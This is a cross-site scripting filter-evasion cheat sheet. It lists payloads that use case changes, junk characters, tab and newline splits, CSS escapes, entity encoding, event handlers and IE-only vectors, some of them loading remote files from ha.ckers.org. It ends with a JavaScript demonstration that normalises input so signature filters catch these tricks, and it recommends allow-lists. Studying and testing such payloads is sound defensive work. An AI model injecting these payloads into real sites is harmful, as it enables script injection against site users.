1. Change the letter case

<sCript>alert('d')</scRipT>
2. Add extra characters to evade regular-expression checks

<<script>alert('c')//<</script>
<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Replace the .js extension with a different one

<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
background-image: url('javascript:alert("XSS");')
}
5. Insert extra characters into the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a newline to evade (the gaps inside "javascript" below were a literal tab or newline in the original; browsers strip ASCII tab, LF and CR from a URL before reading its scheme, so the filter sees "jav ascript" while the browser sees "javascript:")

<img src="jav	ascr	ipt:alert('XSS3')">

<img src="jav
ascr
ipt:alert('XSS3')">

<IMG SRC="jav	ascript:alert('XSS');">

-> tab

-> new line
7. Use "\" to evade (CSS treats a backslash before a non-hex character as that character, and /* */ comments are removed by the CSS parser)

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding (HTML numeric character references) to evade; the trailing ";" of each reference can also be dropped, since browsers treat it as optional

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script inside an HTML tag (event-handler attributes)

<body onload="alert('onload')">

Event-handler attributes that take script:

onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside a SWF file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA sections to split the XSS code and then reassemble it (Internet Explorer XML data islands bound with DATASRC/DATAFLD).

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME (an Internet Explorer behavior).

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
</BODY></HTML>
13. Write a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url()

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
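The recurring point of the list above is that each trick changes the bytes a filter sees without changing what the browser executes. The JavaScript below is an added example written for this page, not code from the original post or from any library: it applies the decoding steps a browser performs (numeric character references with or without the ";", tab/newline removal inside a URL, CSS backslash escapes and comments, case folding) and then runs the same signatures against the raw and the normalised text, so the reader can see exactly which of the page's payloads a raw-byte blacklist misses. The sample payloads are constructed from sections 1, 2, 6, 7, 8 and 9; the entity-encoded forms for section 8 are rebuilt from its description, because the encoded text did not survive on this page. The signature lists, the function names and the benign control sample are this example's own choices.

```javascript
// Added example (not from the original post): why the evasions in sections
// 1, 2, 6, 7, 8 and 9 beat a filter that pattern-matches raw input, and the
// normalisation a filter must do first. Sample payloads are constructed from
// the page; signatures and names are this example's own.

// Guard against out-of-range code points from malformed references.
function codePoint(n) {
  return n > 0x10ffff ? '\uFFFD' : String.fromCodePoint(n);
}

// Section 8: decode &#106; &#x6A; and the semicolon-less &#106 &#x6A forms.
// Like a browser, consume as many digits as are present.
function decodeNumericEntities(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => codePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => codePoint(parseInt(d, 10)));
}

// Section 6: browsers drop ASCII tab, LF and CR from a URL before reading
// its scheme, so "jav<TAB>ascript:" is "javascript:" to the browser.
function stripUrlWhitespace(s) {
  return s.replace(/[\t\n\r]/g, '');
}

// Section 7: in CSS, /* */ comments are removed and a backslash before a
// non-hex character yields that character (expre\ssion -> expression).
// This does not tokenise CSS strings, so it is a normaliser, not a parser.
function unescapeCss(s) {
  return s
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/\\([0-9a-f]{1,6})\s?/gi, (_, h) => codePoint(parseInt(h, 16)))
    .replace(/\\(.)/g, '$1');
}

// Section 1: case folding comes last, after every decoding step.
function normalize(s) {
  return unescapeCss(stripUrlWhitespace(decodeNumericEntities(s))).toLowerCase();
}

// The kind of blacklist the post is ridiculing: case-sensitive literal matches.
const NAIVE_SIGNATURES = [/<script>/, /javascript:/, /expression\(/];
function naiveFilterBlocks(raw) {
  return NAIVE_SIGNATURES.some((re) => re.test(raw));
}

// The same idea applied to the normalised form. A blacklist is still the wrong
// design (an allow-list of tags and attributes is the fix); this only shows
// that matching raw bytes is hopeless.
const SIGNATURES = [/<script\b/, /javascript:/, /expression\(/, /\bon[a-z]+\s*=/];
function normalizedFilterBlocks(raw) {
  return SIGNATURES.some((re) => re.test(normalize(raw)));
}

// Constructed samples, one per trick from the page, plus a benign control.
const SAMPLES = [
  "<sCript>alert('d')</scRipT>",                                      // 1: case
  "<<script>alert('c')//<</script>",                                  // 2: extra chars
  '<SCRIPT a=">" SRC="t.js"></SCRIPT>',                               // 2: junk attribute
  "<IMG SRC=\"jav\tascript:alert('XSS');\">",                         // 6: tab
  "<IMG SRC=\"jav\nascript:alert('XSS');\">",                         // 6: newline
  "<DIV STYLE=\"width: expre\\ssi\\on(alert('XSS31'));\">",           // 7: backslash
  "<IMG STYLE=\"xss:expr/*anyword*/ession(alert('sss'))\">",          // 7: comment
  "<IMG SRC=\"&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')\">", // 8: decimal
  "<IMG SRC=\"&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')\">",        // 8: hex, no ';'
  "<body onload=\"alert('onload')\">",                                // 9: event handler
  '<a href="https://example.com/?q=expression">benign</a>',          // control: must pass
];

// Returns one {raw, naive, normalized} verdict per sample.
function evaluate(samples = SAMPLES) {
  return samples.map((raw) => ({
    raw,
    naive: naiveFilterBlocks(raw),
    normalized: normalizedFilterBlocks(raw),
  }));
}

for (const v of evaluate()) {
  const n = v.naive ? 'naive:BLOCK' : 'naive:pass ';
  const m = v.normalized ? 'norm:BLOCK' : 'norm:pass ';
  console.log(`${n}  ${m}  ${JSON.stringify(v.raw)}`);
}
```

Run it with node; every sample prints a pass/BLOCK verdict from both filters, and only the "<<script>" sample is caught by the naive one. Two caveats a practitioner should keep in mind: normalising before matching rescues a blacklist from these encoding tricks but not from tags or attributes it never listed, so the real fix for untrusted HTML is an allow-list of elements and attributes with URL attributes restricted to http(s); and several vectors on this page (CSS expression(), DYNSRC/LOWSRC, DATASRC/DATAFLD, HTML+TIME, and javascript: URLs in img src, link href, style url() and table background) only fired in old Internet Explorer, whereas javascript: in an iframe or frame src and the on* handlers still execute in current browsers.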